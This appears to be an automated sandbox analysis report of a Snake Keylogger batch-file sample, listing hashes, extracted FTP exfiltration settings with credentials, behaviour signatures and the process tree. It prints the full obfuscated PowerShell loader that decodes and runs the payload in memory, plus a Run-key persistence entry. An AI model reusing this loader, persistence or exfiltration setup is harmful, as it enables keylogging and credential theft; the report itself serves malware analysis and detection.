Analysis
-
max time kernel
79s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-06-2024 01:39
Static task
static1
Behavioral task
behavioral1
Sample
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat
Resource
win10v2004-20240508-en
General
-
Target
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat
-
Size
2.9MB
-
MD5
a65ee5594b619784ddae86580ae0023e
-
SHA1
068ab505bb49206349b08527e88fa764475dc4e3
-
SHA256
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f
-
SHA512
fa454fb624c12a7ceac9ba230134cb63df7321dcf09f5c077d7d94d82e0220fd04222b5f1ade571eb0154c716a284ccf802d76676dd0d6063e3da441dd7c056e
-
SSDEEP
24576:qjdD5w0gCVEM/qU6ucJXtV5g+W1LAXuFyoU/Vgjt5Rxb85lepF+STTdA7jxkbLv8:2D71qdXt/3dKy4JrpFftkbWDoUAiVRTo
Malware Config
Extracted
snakekeylogger
Protocol: ftp- Host:
ftp://files.000webhost.com/ - Port:
21 - Username:
uzo1919 - Password:
Computer@101
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2632-4928-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2632-4928-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2632-4928-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables with potential process hoocking 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2632-4928-0x0000000000400000-0x0000000000426000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DotNetProcHook -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuzpid process 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuzdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kecyrxfnvct = "C:\\Users\\Admin\\AppData\\Roaming\\Kecyrxfnvct.bat" 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuzdescription pid process target process PID 3204 set thread context of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4892 2632 WerFault.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.UuzRegAsm.exepid process 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz 2632 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.UuzRegAsm.exedescription pid process Token: SeDebugPrivilege 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz Token: SeDebugPrivilege 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz Token: SeDebugPrivilege 2632 RegAsm.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
cmd.exe98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuzdescription pid process target process PID 3684 wrote to memory of 1624 3684 cmd.exe cmd.exe PID 3684 wrote to memory of 1624 3684 cmd.exe cmd.exe PID 3684 wrote to memory of 2208 3684 cmd.exe xcopy.exe PID 3684 wrote to memory of 2208 3684 cmd.exe xcopy.exe PID 3684 wrote to memory of 3892 3684 cmd.exe attrib.exe PID 3684 wrote to memory of 3892 3684 cmd.exe attrib.exe PID 3684 wrote to memory of 3204 3684 cmd.exe 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz PID 3684 wrote to memory of 3204 3684 cmd.exe 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz PID 3684 wrote to memory of 3204 3684 cmd.exe 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe PID 3204 wrote to memory of 2632 3204 98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz RegAsm.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz2⤵
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz2⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.UuzC:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz -WindowStyle hidden -command "$Uizrmvoio = Get-Content 'C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat' | select-object -Last 1; $Ubpyh = [System.Convert]::FromBase64String($Uizrmvoio);$Sfqzwt = New-Object System.IO.MemoryStream( , $Ubpyh );$Tcjzzfukost = New-Object System.IO.MemoryStream;$Umuaqpoo = New-Object System.IO.Compression.GzipStream $Sfqzwt, ([IO.Compression.CompressionMode]::Decompress);$Umuaqpoo.CopyTo( $Tcjzzfukost );$Umuaqpoo.Close();$Sfqzwt.Close();[byte[]] $Ubpyh = $Tcjzzfukost.ToArray();[Array]::Reverse($Ubpyh); $Nfaqarukpjv = [System.Threading.Thread]::GetDomain().Load($Ubpyh); $Kgtpyswwtxy = $Nfaqarukpjv.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 15124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2632 -ip 26321⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.UuzFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uptq3qxs.v52.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2632-4928-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/2632-4930-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/2632-4929-0x0000000004E50000-0x0000000004EEC000-memory.dmpFilesize
624KB
-
memory/2632-4931-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/2632-4933-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/3204-74-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-12-0x00000000058C0000-0x0000000005926000-memory.dmpFilesize
408KB
-
memory/3204-8-0x00000000050C0000-0x00000000056E8000-memory.dmpFilesize
6.2MB
-
memory/3204-9-0x0000000005040000-0x0000000005062000-memory.dmpFilesize
136KB
-
memory/3204-10-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/3204-11-0x0000000005760000-0x00000000057C6000-memory.dmpFilesize
408KB
-
memory/3204-64-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-18-0x0000000005930000-0x0000000005C84000-memory.dmpFilesize
3.3MB
-
memory/3204-23-0x0000000006090000-0x00000000060AE000-memory.dmpFilesize
120KB
-
memory/3204-24-0x00000000060C0000-0x000000000610C000-memory.dmpFilesize
304KB
-
memory/3204-26-0x00000000065B0000-0x00000000065CA000-memory.dmpFilesize
104KB
-
memory/3204-25-0x0000000007330000-0x00000000073C6000-memory.dmpFilesize
600KB
-
memory/3204-27-0x00000000065D0000-0x00000000065F2000-memory.dmpFilesize
136KB
-
memory/3204-28-0x0000000007980000-0x0000000007F24000-memory.dmpFilesize
5.6MB
-
memory/3204-29-0x00000000085B0000-0x0000000008C2A000-memory.dmpFilesize
6.5MB
-
memory/3204-30-0x0000000007410000-0x0000000007646000-memory.dmpFilesize
2.2MB
-
memory/3204-32-0x0000000007810000-0x00000000078A2000-memory.dmpFilesize
584KB
-
memory/3204-31-0x0000000007F30000-0x0000000008158000-memory.dmpFilesize
2.2MB
-
memory/3204-33-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-62-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-42-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-50-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-66-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-76-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-78-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-6-0x0000000004A50000-0x0000000004A86000-memory.dmpFilesize
216KB
-
memory/3204-72-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-70-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-69-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-7-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/3204-34-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-60-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-58-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-56-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-52-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-48-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-54-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-46-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-44-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-40-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-38-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-37-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-92-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-90-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-88-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-96-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-94-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-86-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-84-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-82-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-80-0x0000000007F30000-0x0000000008152000-memory.dmpFilesize
2.1MB
-
memory/3204-4920-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/3204-4921-0x0000000008160000-0x00000000081C2000-memory.dmpFilesize
392KB
-
memory/3204-4922-0x0000000007930000-0x000000000797C000-memory.dmpFilesize
304KB
-
memory/3204-4923-0x00000000081D0000-0x0000000008224000-memory.dmpFilesize
336KB
-
memory/3204-4932-0x0000000075110000-0x00000000758C0000-memory.dmpFilesize
7.7MB
-
memory/3204-5-0x000000007511E000-0x000000007511F000-memory.dmpFilesize
4KB